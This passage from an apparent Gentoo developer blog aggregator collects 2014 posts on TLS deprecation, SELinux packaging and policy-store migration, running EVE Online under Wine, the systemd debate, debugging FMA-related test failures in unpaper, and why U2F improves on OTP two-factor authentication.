* Keys with weak choices need to be deprecated at some point. In a long process browsers removed most certificates with short 1024 bit keys. They're working hard on deprecating signatures with the weak SHA1 algorithm. I think e=3 RSA keys should be next on the list for deprecation.
* At some point we should deprecate the weak CBC modes. This is probably the trickiest part, because up until very recently TLS 1.0 was all that most major browsers supported. The only way to avoid them is either using the GCM mode of TLS 1.2 (most browsers just got support for that in recent months) or using a very new extension (https://tools.ietf.org/html/rfc7366) that's rarely used at all today.
* If we have better technologies we should start using them. PKCS #1 2.1 is clearly superior to PKCS #1 1.5, at least if new standards get written people should switch to it.

November 02, 2014
Sven Vermeulen a.k.a. swift (homepage, bugs)

I just finished updating 102 packages. The change? Removing the following from the ebuilds:

DEPEND="selinux? ( sec-policy/selinux-${packagename} )"

In the past, we needed this construction in both DEPEND and RDEPEND. Recently however, the SELinux eclass got updated with some logic to relabel files after the policy package is deployed. As a result, the DEPEND variable no longer needs to refer to the SELinux policy package.
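
In other words, the policy package now only needs to appear as a runtime dependency. A minimal sketch of what the relevant part of an ebuild looks like after the change (the package name is just a placeholder):

# Before: the policy package had to be listed in both variables
# DEPEND="selinux? ( sec-policy/selinux-${packagename} )"
# RDEPEND="selinux? ( sec-policy/selinux-${packagename} )"

# After: only the runtime dependency remains
RDEPEND="selinux? ( sec-policy/selinux-${packagename} )"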

This change also means that those moving from a regular Gentoo installation to an SELinux installation will have far fewer packages to rebuild. In the past, getting USE="selinux" (through the SELinux profiles) would rebuild all packages that have a DEPEND dependency on the SELinux policy package. No more – only packages that depend on the SELinux libraries (like libselinux) or utilities rebuild. The rest will just pull in the proper policy package.

October 31, 2014
Aaron W. Swenson a.k.a. titanofold (homepage, bugs)
EVE Online on Gentoo Linux (October 31, 2014, 16:56 UTC)

Good news, everyone! I’m finally rid of Windows.

A couple weeks ago my Windows installation corrupted itself on the 5 minute trip home from the community theatre. I didn’t command it to go to sleep, I just unplugged it and closed the lid. Somehow, it managed to screw up its startup files, and the restore process didn’t do what it was supposed to, so I was greeted with a blank screen. No errors. Just staring into the void.

I’ve been using Windows as the sole OS on this machine with Gentoo running in VirtualBox for various reasons related to minor annoyances of unsupported hardware, but as I needed a working machine sooner rather than later and the only tools I could find to solve my Windows problem appeared to be old, defunct, and/or suspicious, I downloaded an ISO of SystemRescueCd (www.sysresccd.org) and installed Gentoo in the sliver of space left on the drive.

There were only two real reasons why I was intent on keeping Windows: Netflix (netflix.com) and EVE Online (eveonline.com). I intended to get Windows up and running once the show was over at the theatre, but then I read about Netflix being supported in Linux (www.mpagano.com). That left me with just one reason to keep Windows: EVE. I turned to Wine (www.winehq.org) and discovered reports of it running EVE quite well (appdb.winehq.org). I also learned that the official Mac OS release of EVE runs on Cider (www.transgaming.com), which is based on Wine.

I had another hitch: I chose the no-multilib stage3 for that original sliver thinking I wouldn’t be running anything other than 64 bit software, and drive space was at a premium. EVE Online is 32 bit.

So I had to begin my adventure with switching to multilib. This didn’t involve me reinstalling Gentoo thanks to a handy, but unsupported and unofficial, guide (jkroon.blogs.uls.co.za) by Jaco Kroon.

As explained on Multilib System without emul-linux Packages (wiki.gentoo.org), I decided it’s better to build my own 32 bit libraries. So, the next step is to mask the emulation packages:

# /etc/portage/package.mask
app-emulation/emul-linux-x86-*

Because I didn’t want to build a 32 bit variant for everything on my system, I iterated through what Portage wanted and marked several packages to build their 32 bit variant via use flags. This is what I wound up with:

# /etc/portage/package.use
app-arch/bzip2 abi_x86_32
app-emulation/wine mono abi_x86_32
dev-libs/elfutils static-libs abi_x86_32
dev-libs/expat abi_x86_32
dev-libs/glib abi_x86_32
dev-libs/gmp abi_x86_32
dev-libs/icu abi_x86_32
dev-libs/libffi abi_x86_32
dev-libs/libgcrypt abi_x86_32
dev-libs/libgpg-error abi_x86_32
dev-libs/libpthread-stubs abi_x86_32
dev-libs/libtasn1 abi_x86_32
dev-libs/libxml2 abi_x86_32
dev-libs/libxslt abi_x86_32
dev-libs/nettle abi_x86_32
dev-util/pkgconfig abi_x86_32
media-libs/alsa-lib abi_x86_32
media-libs/fontconfig abi_x86_32
media-libs/freetype abi_x86_32
media-libs/glu abi_x86_32
media-libs/libjpeg-turbo abi_x86_32
media-libs/libpng abi_x86_32
media-libs/libtxc_dxtn abi_x86_32
media-libs/mesa abi_x86_32
media-libs/openal abi_x86_32
media-sound/mpg123 abi_x86_32
net-dns/avahi abi_x86_32
net-libs/gnutls abi_x86_32
net-print/cups abi_x86_32
sys-apps/dbus abi_x86_32
sys-devel/llvm abi_x86_32
sys-fs/udev gudev abi_x86_32
sys-libs/gdbm abi_x86_32
sys-libs/ncurses abi_x86_32
sys-libs/zlib abi_x86_32
virtual/glu abi_x86_32
virtual/jpeg abi_x86_32
virtual/libffi abi_x86_32
virtual/libiconv abi_x86_32
virtual/libudev abi_x86_32
virtual/opengl abi_x86_32
virtual/pkgconfig abi_x86_32
x11-libs/libX11 abi_x86_32
x11-libs/libXau abi_x86_32
x11-libs/libXcursor abi_x86_32
x11-libs/libXdamage abi_x86_32
x11-libs/libXdmcp abi_x86_32
x11-libs/libXext abi_x86_32
x11-libs/libXfixes abi_x86_32
x11-libs/libXi abi_x86_32
x11-libs/libXinerama abi_x86_32
x11-libs/libXrandr abi_x86_32
x11-libs/libXrender abi_x86_32
x11-libs/libXxf86vm abi_x86_32
x11-libs/libdrm abi_x86_32
x11-libs/libvdpau abi_x86_32
x11-libs/libxcb abi_x86_32
x11-libs/libxshmfence abi_x86_32
x11-proto/damageproto abi_x86_32
x11-proto/dri2proto abi_x86_32
x11-proto/dri3proto abi_x86_32
x11-proto/fixesproto abi_x86_32
x11-proto/glproto abi_x86_32
x11-proto/inputproto abi_x86_32
x11-proto/kbproto abi_x86_32
x11-proto/presentproto abi_x86_32
x11-proto/randrproto abi_x86_32
x11-proto/renderproto abi_x86_32
x11-proto/xcb-proto abi_x86_32 python_targets_python3_4
x11-proto/xextproto abi_x86_32
x11-proto/xf86bigfontproto abi_x86_32
x11-proto/xf86driproto abi_x86_32
x11-proto/xf86vidmodeproto abi_x86_32
x11-proto/xineramaproto abi_x86_32
x11-proto/xproto abi_x86_32

Now emerge both Wine — the latest and greatest of course — and the questionable library so textures will be rendered:

emerge -av media-libs/libtxc_dxtn =app-emulation/wine-1.7.29

You may get some messages along the lines of:

emerge: there are no ebuilds to satisfy ">=sys-libs/zlib-1.2.8-r1".

This was a bit of a head scratcher for me. I have sys-libs/zlib-1.2.8-r1 installed. I didn’t have to accept its keyword. It’s already stable! I haven’t really looked into why, but you have to accept its keyword to press forward:

# echo '=sys-libs/zlib-1.2.8-r1' >> /etc/portage/package.accept_keywords

You’ll have to do the above several times for other packages when you try to emerge Wine. Most of the time the particular version it wants is something you already have installed. Check what you do have installed with eix or other favorite tool so you don’t downgrade anything. Once wine is installed, as your user run:

$ winecfg

Download the EVE Online Windows installer and run it using Wine:

$ wine EVE_Online_Installer_*.exe

Once that’s done, invoke the launcher as:

$ force_s3tc_enable=true wine 'C:\Program Files (x86)\CCP\EVE\eve.exe'

force_s3tc_enable=true is needed to enable texture rendering. Without it, EVE will freeze during start up. (If you didn’t emerge media-libs/libtxc_dxtn, EVE will start, but none of the textures will load, and you’ll have a lot of black on black objects.) I didn’t have to do any of the other things I’ve found, such as disabling DirectX 11.
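
To avoid retyping all of that, you can wrap it in a tiny launcher script. This is just a sketch, and it assumes the default install path used by the installer above; adjust it if you changed your Wine prefix:

#!/bin/sh
# ~/bin/eve -- hypothetical wrapper; force_s3tc_enable is needed for textures
export force_s3tc_enable=true
exec wine 'C:\Program Files (x86)\CCP\EVE\eve.exe' "$@"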

As for my Linux setup: I have a Radeon HD6480G (SUMO/r600) in my ThinkPad Edge E525, and I’m using the open source radeon (www.x.org) drivers with graphics on high and medium anti-aliasing with Mesa and OpenGL. For the most part, I find the game play to be smooth and indistinguishable from my experience on Windows.

There are a few things that don’t work well. Psychedelic rendering artifacts galore when I open the in-game browser (IGB) or switch to another application, but that’s resolved without logging out of EVE by changing the graphics quality to something else. It may be related to resource caching, but I need to do more testing. I haven’t tried going into the Captain’s Quarters (other users have reported crashes entering there) as back on Windows that brings my system to a crawl, and there isn’t anything particularly interesting about going in there…yet.

Overall, I’m quite happy with the EVE/Wine experience on Gentoo. It was quite easy and there wasn’t any real troubleshooting for me to do.

If you’re a fellow Gentoo-er in EVE, drop me a line. If you want to give EVE a go, have an extra week on me.

Update: I’ve been informed by Aatos Taavi that running EVE in windowed mode works quite well. I’ve also been informed that we need to declare stable packages in package.accept_keywords because abi_x86_32 is use-masked.

Sven Vermeulen a.k.a. swift (homepage, bugs)
Using multiple priorities with modules (October 31, 2014, 16:24 UTC)

One of the new features of the 2.4 SELinux userspace is support for module priorities. The idea is that distributions and administrators can override a (pre)loaded SELinux policy module with another module without removing the previous module. The lower-priority module will remain in the store, but will not be active until the higher-priority module is disabled or removed again.

The “old” modules (pre-2.4) are loaded with priority 100. When policy modules with the 2.4 SELinux userspace series are loaded, they get loaded with priority 400. As a result, the following message occurs:

~# semodule -i screen.pp
libsemanage.semanage_direct_install_info: Overriding screen module at lower priority 100 with module at priority 400

So unlike the previous situation, where the older module is substituted with the new one, we now have two “screen” modules loaded; the last one gets priority 400 and is active. To see all installed modules and priorities, use the --list-modules option:

~# semodule --list-modules=all | grep screen
100 screen     pp
400 screen     pp

Older versions of modules can be removed by specifying the priority:

~# semodule -X 100 -r screen
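
The -X switch works for installation as well; if I read the tooling correctly you can pick the priority explicitly at install time, for instance to load a locally patched module above the one shipped by the distribution (the priority value below is just an illustration):

~# semodule -X 500 -i screen.pp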

October 30, 2014
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)

I have been trying my best not to comment on systemd one way or another for a while. For the most part because I don't want to have a trollfest on my blog, because moderating it is something I hate and I'm sure would be needed. On the other hand it seems like people start to bring me in the conversation now from time to time.

What I would like to point out at this point is that both extreme sides of the vision are, in my opinion, behaving childishly and being totally unprofessional. Whether it is name-calling of the people or the software, death threats, insults, satirical websites, labeling of 300 people for a handful of them, etc.

I don't think I have been as happy to have a job that allows me not to care about open source as much as I did before as in the past few weeks as things keep escalating and escalating. You guys are the worst. And again I refer to both supporters and detractors, devs of systemd, devs of eudev, Debian devs and Gentoo devs, and so on so forth.

And the reason why I say this is because you both want to bring this to extremes that I think are totally uncalled for. I don't see the world in black and white and I think I said that before. Gray is nuanced and interesting, and needs skills to navigate, so I understand it's easier to just take a stand and never revise your opinion, but the easy way is not what I care about.

Myself, I decided to migrate my non-server systems to systemd a few months ago. It works fine. I've considered migrating my servers, and I decided for the moment to wait. The reason is technical for the most part: I don't think I trust the stability promises for the moment and I don't reboot servers that often anyway.

There are good things to the systemd design. And I'm sure that very few people will really miss sysvinit as is. Most people, especially in Gentoo, have not been using sysvinit proper, but rather through OpenRC, which shares more spirit with systemd than sysv, either by coincidence or because they are just the right approach to things (declarativeness to begin with).

At the same time, I don't like Lennart's approach on this to begin with, and I don't think it's uncalled for to criticize the product based on the person in this case, as the two are tightly coupled. I don't like moderating people away from a discussion, because it just ends up making the discussion even more confrontational on the next forum you stumble across them — this is why I never blacklisted Ciaran and friends from my blog even after a group of them started pasting my face on pictures of nazi soldiers from WW2. Yes I agree that Gentoo has a good chunk of toxic supporters, I wish we got rid of them a long while ago.

At the same time, if somebody were to try to categorize me the same way as the people who decided to fork udev without even thinking of what they were doing, I would want to point out that I was reproaching them from day one for their absolutely insane (and inane) starting announcement and first few commits. And I have not been using it ever, since for the moment they seem to have made good on the promise of not making it impossible to run udev without systemd.

I don't agree with the complete direction right now, and especially with the one-size-fit-all approach (on either side!) that tries to reduce the "software biodiversity". At the same time there are a few designs that would be difficult for me to attack given that they were ideas of mine as well, at some point. Such as the runtime binary approach to hardware IDs (that Greg disagreed with at the time and then was implemented by systemd/udev), or the usage of tmpfs ACLs to allow users at the console to access devices — which was essentially my original proposal to get rid of pam_console (that played with owners instead, making it messy when having more than one user at console), when consolekit and its groups-fiddling was introduced (groups can be used for setgid, not a good idea).

So why am I posting this? Mostly to tell everybody out there that if you plan on using me for either side point to be brought home, you can forget about it. I'll probably get pissed off enough to try to prove the exact opposite, and then back again.

Neither of you is perfectly right. You both make mistakes. And you both are unprofessional. Try to grow up.

Edit: I mistyped eudev in the original article and it read euscan. Sorry Corentin, was thinking one thing and typing another.

Sven Vermeulen a.k.a. swift (homepage, bugs)

In a few moments, SELinux users who have the ~arch KEYWORDS set (either globally or for the SELinux utilities in particular) will notice that the SELinux userspace will upgrade to version 2.4 (release candidate 5 for now). This upgrade comes with a manual step that needs to be performed after the upgrade. The information is mentioned as a post-installation message of the policycoreutils package, and basically says that you need to execute:

~# /usr/libexec/selinux/semanage_migrate_store

The reason is that the SELinux utilities expect the SELinux policy module store (and the semanage related files) to be in /var/lib/selinux and no longer in /etc/selinux. Note that this does not mean that the SELinux policy itself is moved outside of that location, nor is the basic configuration file (/etc/selinux/config). It is what tools such as semanage manage that is moved outside that location.

I tried to automate the migration as part of the packages themselves, but this would require the portage_t domain to be able to move, rebuild and load policies, which it can’t (and to be honest, shouldn’t). Instead of augmenting the policy or making updates to the migration script as delivered by the upstream project, we currently decided to have the migration done manually. It is a one-time migration anyway.

If for some reason end users forget to do the migration, then that does not mean that the system breaks or becomes unusable. SELinux still works, SELinux aware applications still work; the only thing that will fail are updates on the SELinux configuration through tools like semanage or setsebool – the latter when you want to persist boolean changes.

~# semanage fcontext -l
ValueError: SELinux policy is not managed or store cannot be accessed.
~# setsebool -P allow_ptrace on
Cannot set persistent booleans without managed policy.

If you get those errors or warnings, all that is left to do is the migration. Note in the following that there is a warning about ‘else’ blocks that are no longer supported: that’s okay, as far as I know (and it was mentioned on the upstream mailing list as not something to worry about) it does not have any impact.

~# /usr/libexec/selinux/semanage_migrate_store
Migrating from /etc/selinux/mcs/modules/active to /var/lib/selinux/mcs/active
Attempting to rebuild policy from /var/lib/selinux
sysnetwork: Warning: 'else' blocks in optional statements are unsupported in CIL. Dropping from output.

You can also add -c so that the old policy module store is cleaned up, and the command can safely be rerun multiple times:

~# /usr/libexec/selinux/semanage_migrate_store -c
warning: Policy type mcs has already been migrated, but modules still exist in the old store. Skipping store.
Attempting to rebuild policy from /var/lib/selinux

You can manually clean up the old policy module store like so:

~# rm -rf /etc/selinux/mcs/modules
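
And to convince yourself that the migration worked, just rerun one of the commands that failed earlier; a quick, hedged sanity check:

~# semanage fcontext -l > /dev/null && echo "managed policy store is back"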

So… don’t worry – the change is small and does not break stuff. And for those wondering about CIL I’ll talk about it in one of my next posts.

October 29, 2014
Nathan Zachary a.k.a. nathanzachary (homepage, bugs)
Happy 17th! (October 29, 2014, 15:10 UTC)

Just wanted to wish you a Happy 17th Birthday, Noah. I hope that it is a great day for you, and that the upcoming year is even better than this past one! My wish for you this year is that you are able to take time to enjoy the truly important things in life: family, friends, your health, and the events that don’t require anything more than your attention. Take the time—MAKE the time—to stop and appreciate the world around you.

–Zach

October 27, 2014
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)

Yesterday I have released a new version of unpaper which is now in Portage, even though its dependencies are not exactly straightforward after making it use libav. But when I packaged it, I realized that the tests were failing — even though I had been sure to run the tests all the time while making changes, to make sure not to break the algorithms which (as you may remember) I have not designed or written — I don't really have enough math to figure out what's going on with them. I was able to simplify a few things but I needed Luca's help for the most part.

Turned out that the problem only happened when building with -O2 -march=native so I decided to restrict tests and look into it in the morning again. Indeed, on Excelsior, using -march=native would cause it to fail, but on my laptop (where I have been running the test after every single commit), it would not fail. Why? Furthermore, Luca was also reporting test failures on his laptop with OSX and clang, but I had not tested there to begin with.

A quick inspection of one of the failing tests' outputs with vbindiff showed that the diffs would be quite minimal, one bit off at some non-obvious interval. It smelled like a very minimal change. After complaining on G+, Måns pushed me to the right direction: some instruction set that differs between the two.

My laptop uses the core-avx-i arch, while the server uses bdver1. They have different levels of SSE4 support – AMD having their own SSE4a implementation – and different extensions. I should probably have paid more attention here and noticed how the Bulldozer has FMA4 instructions, but I did not; it'll prove important later.

I decided to start disabling extensions in alphabetical order, mostly expecting the problem to be in AMD's implementation of some instructions pending some microcode update. When I disabled AVX, the problem went away — AVX has essentially a new encoding of instructions, so enabling AVX causes all the instructions otherwise present in SSE to be re-encoded, and is a dependency for FMA4 instructions to be usable.

The problem was reducing the code enough to be able to figure out if the problem was a bug in the code, in the compiler, in the CPU or just in the assumptions. Given that unpaper is over five thousand lines of code and comments, I needed to reduce it a lot. Luckily, there are ways around it.

The first step is to look in which part of the code the problem appears. Luckily unpaper is designed with a bunch of functions that run one after the other. I started disabling filters and masks and I was able to limit the problem to the deskewing code — which is when most of the problems happened before.

But even the deskewing code is a lot — and it depends on at least some part of the general processing to be run, including loading the file and converting it to an AVFrame structure. I decided to try to reduce the code to a standalone unit calling into the full deskewing code. But when I copied over and looked at how much code was involved, between the skew detection and the actual rotation, it was still a lot. I decided to start looking with gdb to figure out which of the two halves was misbehaving.

The interface between the two halves is well-defined: the first returns the detected skew, and the latter takes the rotation to apply (the negative of what the first returned) and the image to apply it to. It's easy. A quick look through gdb on the call to rotate() in both a working and failing setup told me that the returned value from the first half matched perfectly; this is great because it meant that the surface to inspect was heavily reduced.

Since I did not want to have to test all the code to load the file from disk and decode it into a RAW representation, I looked into the gdb manual and found the dump commands that allow you to dump part of the process's memory into a file. I dumped the AVFrame::data content, and decided to use that as an input. At first I decided to just compile it into the binary (you only need to use xxd -i to generate C code that declares the whole binary file as a byte array) but it turns out that GCC is not designed to compile a 17MB binary blob passed in as a byte array efficiently. I then opted for just opening the raw binary file and fread() it into the AVFrame object.
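
For reference, the gdb side looks roughly like this; a hedged sketch, since the exact expressions depend on the frame being inspected (source and frame_size are placeholders, loosely matching the rotate() code quoted further down):

(gdb) break rotate
(gdb) run testfile.pnm
(gdb) dump binary memory frame0.raw source->data[0] source->data[0] + frame_size

The resulting frame0.raw is then what gets fread() back into the AVFrame object in the reduced test case.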

My original plan involved using creduce to find the minimal set of code needed to trigger the problem, but it was tricky, especially when trying to match a complete file output to the md5. I decided to proceed with the reduction manually, starting from all the conditionals for pixel formats that were not exercised… and then I realized that I could split the code again into two operations. Indeed while the main interface is only rotate(), there were two logical parts of the code in use, one translating the coordinates before-and-after the rotation, and the interpolation code that would read the old pixels and write the new ones. This latter part also depended on all the code to set the pixel in place starting from its components.

By writing as output the calls to the interpolation function, I was able to restrict the issue to the coordinate translation code, rather than the interpolation one, which made it much better: the reduced test case went down to a handful of lines:

void rotate(const float radians, AVFrame *source, AVFrame *target) {
    const int w = source->width;
    const int h = source->height;

    // create 2D rotation matrix
    const float sinval = sinf(radians);
    const float cosval = cosf(radians);
    const float midX = w / 2.0f;
    const float midY = h / 2.0f;

    for (int y = 0; y < h; y++) {
        for (int x = 0; x < w; x++) {
            const float srcX = midX + (x - midX) * cosval + (y - midY) * sinval;
            const float srcY = midY + (y - midY) * cosval - (x - midX) * sinval;
            externalCall(srcX, srcY);
        }
    }
}

Here externalCall is a simple function to extrapolate the values; the only thing it does is print them on the standard error stream. In this version there is still a reference to the input and output AVFrame objects, but as you can notice there is no usage of them, which means that now the testcase is self-contained and does not require any input or output file.

Much better but still too much code to go through. The inner loop over x was simple to remove, just hardwire it to zero and the compiler still was able to reproduce the problem, but if I hardwired y to zero, then the compiler would trigger constant propagation and just pre-calculate the right value, whether or not AVX was in use.

At this point I was able to execute creduce; I only needed to check for the first line of the output to match the "incorrect" version, and no input was requested (the radians value was fixed). Unfortunately it turns out that using creduce with loops is not a great idea, because it is well possible for it to reduce away the y++ statement or the y < h comparison for exit, and then you're in trouble. Indeed it got stuck multiple times in infinite loops on my code.

But it did help a little bit to simplify the calculation. And with again a lot of help by Måns on making sure that the sinf()/cosf() functions would not return different values – they don't, also they are actually collapsed by the compiler to a single call to sincosf(), so you don't have to write ugly code to leverage it! – I brought down the code to

extern void externCall(float);
extern float sinrotation();
extern float cosrotation();

static const float midX = 850.5f;
static const float midY = 1753.5f;

void main() {
    const float srcX = midX * cosrotation() - midY * sinrotation();
    externCall(srcX);
}

No external libraries, not even libm. The external functions are in a separate source file, and beside providing fixed values for sine and cosine, the externCall() function only calls printf() with the provided value. Oh, if you're curious, the radians parameter became 0.6f, because 0, 1 and 0.5 would not trigger the behaviour, but 0.6, which is the truncated version of the actual parameter coming from the test file, would.

Checking the generated assembly code for the function then pointed out the problem, at least to Måns who actually knows Intel assembly. Here follows a diff of the code above, built with -march=bdver1 and with -march=bdver1 -mno-fma4 — because it turns out the instruction causing the problem is not an AVX one but an FMA4 one, more on that after the diff.

        movq    -8(%rbp), %rax
        xorq    %fs:40, %rax
        jne     .L6
-       vmovss  -20(%rbp), %xmm2
-       vmulss  .LC1(%rip), %xmm0, %xmm0
-       vmulss  .LC0(%rip), %xmm2, %xmm1
+       vmulss  .LC1(%rip), %xmm0, %xmm0
+       vmovss  -20(%rbp), %xmm1
+       vfmsubss        %xmm0, .LC0(%rip), %xmm1, %xmm0
        leave
        .cfi_remember_state
        .cfi_def_cfa 7, 8
-       vsubss  %xmm0, %xmm1, %xmm0
        jmp     externCall@PLT
 .L6:
        .cfi_restore_state

It's interesting that it's changing the order of the instructions as well, as well as the constants — for this diff I have manually swapped .LC0 and .LC1 on one side of the diff, as they would just end up with different names due to instruction ordering.

As you can see, the FMA4 version has one instruction less: vfmsubss replaces both one of the vmulss and the one vsubss instruction. vfmsubss is a FMA4 instruction that performs a Fused Multiply and Subtract operation — midX * cosrotation() - midY * sinrotation() indeed has a multiply and subtract!

Originally, since I was disabling the whole AVX instruction set, all the vmulss instructions would end up replaced by mulss which is the SSE version of the same instruction. But when I realized that the missing correspondence was vfmsubss and I googled for it, it was obvious that FMA4 was the culprit, not the whole AVX.

Great, but how does that explain the failure on Luca's laptop? He's not so crazy as to use an AMD laptop — nobody would be! Well, turns out that Intel also has its own Fused Multiply-Add instruction set, just with three operands rather than four, starting from Haswell CPUs, which include… Luca's laptop. A quick check on my NUC which also has a Haswell CPU confirms that the problem exists also for the core-avx2 architecture, even though the code diff is slightly less obvious:

        movq    -24(%rbp), %rax
        xorq    %fs:40, %rax
        jne     .L6
-       vmulss  .LC1(%rip), %xmm0, %xmm0
-       vmovd   %ebx, %xmm2
-       vmulss  .LC0(%rip), %xmm2, %xmm1
+       vmulss  .LC1(%rip), %xmm0, %xmm0
+       vmovd   %ebx, %xmm1
+       vfmsub132ss     .LC0(%rip), %xmm0, %xmm1
        addq    $24, %rsp
+       vmovaps %xmm1, %xmm0
        popq    %rbx
-       vsubss  %xmm0, %xmm1, %xmm0
        popq    %rbp
        .cfi_remember_state
        .cfi_def_cfa 7, 8

Once again I swapped .LC0 and .LC1 afterwards for consistency.

The main difference here is that the instruction for fused multiply-subtract is vfmsub132ss and a vmovaps is involved as well. If I read the documentation correctly this is because it stores the result in %xmm1 but needs to move it to %xmm0 to pass it to the external function. I'm not enough of an expert to tell whether gcc is doing extra work here.

So why is this instruction causing problems? Well, Måns knew and pointed out that the result is now more precise, thus I should not work around it. Wikipedia, as linked before, also points out why this happens:

A fused multiply–add is a floating-point multiply–add operation performed in one step, with a single rounding. That is, where an unfused multiply–add would compute the product b×c, round it to N significant bits, add the result to a, and round back to N significant bits, a fused multiply–add would compute the entire sum a+b×c to its full precision before rounding the final result down to N significant bits.
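
You can see the same effect in isolation with libm's fmaf(), which performs the fused (single-rounding) operation; a minimal sketch with arbitrary values rather than the actual numbers from unpaper, so whether the two results differ in the last bit depends on the inputs:

#include <math.h>
#include <stdio.h>

int main(void) {
    float a = 850.5f, b = 0.825335f, c = 0.1234567f;

    float unfused = a * b + c;     /* product rounded to float, then sum rounded */
    float fused   = fmaf(a, b, c); /* whole a*b + c computed, rounded only once */

    printf("unfused: %.10g\nfused:   %.10g\n", unfused, fused);
    return 0;
}

Depending on the compiler's -ffp-contract setting and the target architecture, the "unfused" expression may itself be contracted into an FMA, which is exactly the kind of surprise that bit unpaper here.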

Unfortunately this does mean that we can't have bitexactness of images for CPUs that implement fused operations. Which means my current test harness is not good, as it compares the MD5 of the output with the golden output from the original test. My probable next move is to use cmp to count how many bytes differ from the "golden" output (the version without optimisations in use), and if the number is low, like less than 1‰, accept it as valid. It's probably not ideal and could lead to further variation in output, but it might be a good start.
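
Something along these lines is what I have in mind — just a sketch, with placeholder file names and the 1‰ threshold hard-coded:

#!/bin/sh
# cmp -l prints one line per differing byte, so counting lines counts mismatches
diffbytes=$(cmp -l golden.pnm output.pnm | wc -l)
total=$(stat -c %s golden.pnm)
# accept the result if fewer than one byte in a thousand differs
if [ $(( diffbytes * 1000 )) -lt "$total" ]; then
    echo "close enough"
else
    echo "too different"
fi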

Optimally, as I said a long time ago, I would like to use a tool like pdiff to tell whether there are actual changes in the pixels, and identify things like a 1-pixel translation in any direction, which would be harmless… but until I can figure something out, it'll be an imperfect testsuite anyway.

A huge thanks to Måns for the immense help, without him I wouldn't have figured it out so quickly.

Why is U2F better than OTP? (October 27, 2014, 11:22 UTC)

It is not really obvious to many people how U2F is better than OTP for two-factor authentication; in particular I've seen it compared with full-blown smartcard-based authentication, and I think that's a bad comparison to do.

Indeed, the Security Key is not protected by a PIN, and the NEO-n is designed to be semi-permanently attached to a laptop or desktop. At first this seems pretty insecure, about as secure as storing the authorization straight on the computer, but it's not the case.

But let's start from the target users: the Security Key is not designed to replace the pure-paranoia security devices such as 16Kibit-per-key smartcards, but rather the on-phone or by-SMS OTP two-factor authenticators, those that use the Google Authenticator or other opensource implementations or that are configured to receive SMS.

Why replace those? At first sight they all sound like perfectly good ideas, so what's to be gained by replacing them? Well, there are plenty of things, the first being the user friendliness of this concept. I know it's an overused metaphor, but I do actually judge features on whether my mother would be able to use them or not — she's not a stupid person and can use a computer mostly just fine, but adding any more procedures is something that would frustrate her quite a bit.

So either having to open an application and figure out which of many codes to use at one time, or having to receive an SMS and then re-type the code, would not be something she'd be happy with. Even more so because she does not have a smartphone, and she does not keep her phone on all the time, as she does not want to be bothered by people. Which makes both the Authenticator and SMS ways not a good choice — and let's not try to suggest that there are ways to not be available on the phone without turning it off, it would be one more thing to learn that she does not care about.

Similar to the "phone-is-not-connected" problem, but for me rather than my mother, is the "wrong-country-for-the-phone" problem: I travel a lot, this year aiming for over a hundred days on the road, and there are very few countries in which I keep my Irish phone number available – namely Italy and the UK, where Three is available and I don't pay roaming, when the roaming system works… last time I was in London the roaming system was not working – in the others, including the US which is obviously my main destination, I have a local SIM card so I can use data and calls. This means that if my 2FA setup sends an SMS to the Irish number, I won't receive it easily.

Admittedly, an alternative way to do this would be for me to buy a cheap featurephone, so that instead of losing access to that SIM, I can at least receive calls/SMS.

This is not only theoretical. I have been at two conferences already (USENIX LISA 13, and Percona MySQL Conference 2014) and realized I had locked myself out of my LinkedIn account: the connection comes from a completely different country than usual (US rather than Ireland) and it requires reauthentication… but it was configured to send the SMS to my Irish phone, which I had no access to. Given that conferences are exactly where you meet people you may want to look up on LinkedIn, it's quite inconvenient — luckily the authentication on the phone persists.

The authenticator apps are definitely more reliable than that when you travel, but they also come with their own set of problems. Besides the incomplete coverage of services (LinkedIn, noted above, for instance does not support authenticator apps), which is going to be a problem for U2F as well, at least at the beginning, neither Google's nor Fedora's authenticator app allows you to take a backup of the private keys used for OTP authentication, which means that when you change your phone you'll have to replace, one by one, the OTP generation parameters. For some services such as Gandi, there is also no way to have a backup code, so if you happen to lose, break, or reset your phone without disabling the second factor auth, you're now in trouble.

Then there are a few more technical problems; HOTP, similarly to other OTP implementations, relies on shared state between the generator and the validator: a counter of how many times the code was generated. The client will increase it with every generation, the server should only increase it after a successful authentication. Even discounting bugs on the server side, a malicious actor whose intent is to lock you out can just make sure to generate enough codes on your device that the server will not look ahead enough to find the valid code.

TOTP instead relies on synchronization of time between server and generator, which is a much safer assumption. Unfortunately, this also means you have a limited amount of time to type your code, which is tricky for many people who're not used to typing quickly — Luca, for instance.
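
To make the difference concrete, here is a minimal HOTP sketch in C in the style of RFC 4226, using OpenSSL's HMAC; the key is the RFC test secret and the 30-second TOTP step is just the common default. The only thing that changes between HOTP and TOTP is where the counter comes from.

#include <stdio.h>
#include <stdint.h>
#include <time.h>
#include <openssl/evp.h>
#include <openssl/hmac.h>

/* HOTP: HMAC-SHA-1 over the big-endian counter, then dynamic truncation. */
static unsigned hotp(const uint8_t *key, int keylen, uint64_t counter, int digits)
{
    uint8_t msg[8];
    for (int i = 7; i >= 0; i--) { msg[i] = counter & 0xff; counter >>= 8; }

    unsigned char digest[EVP_MAX_MD_SIZE];
    unsigned int len = 0;
    HMAC(EVP_sha1(), key, keylen, msg, sizeof msg, digest, &len);

    int offset = digest[len - 1] & 0x0f;                /* dynamic truncation */
    uint32_t bin = ((digest[offset]     & 0x7f) << 24) |
                   ((digest[offset + 1] & 0xff) << 16) |
                   ((digest[offset + 2] & 0xff) <<  8) |
                    (digest[offset + 3] & 0xff);

    uint32_t mod = 1;
    for (int i = 0; i < digits; i++) mod *= 10;
    return bin % mod;
}

int main(void)
{
    const uint8_t key[] = "12345678901234567890";       /* RFC 4226 test secret */

    /* HOTP: both sides have to keep the counter in sync */
    printf("HOTP(counter=0): %06u\n", hotp(key, 20, 0, 6));

    /* TOTP: the "counter" is just the current 30-second time step */
    printf("TOTP(now):       %06u\n", hotp(key, 20, (uint64_t)time(NULL) / 30, 6));
    return 0;
}

A desynchronized counter is exactly the lockout scenario described above; with TOTP the only shared state is a reasonably accurate clock.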

There is one more problem with both implementations: they rely on the user to choose the right entry in the list and copy the right OTP value. This means you can still phish a user to type in an OTP and use it to authenticate against the service: 2FA is a protection against third parties gaining access to your account by having your password posted online, rather than a protection against phishing.

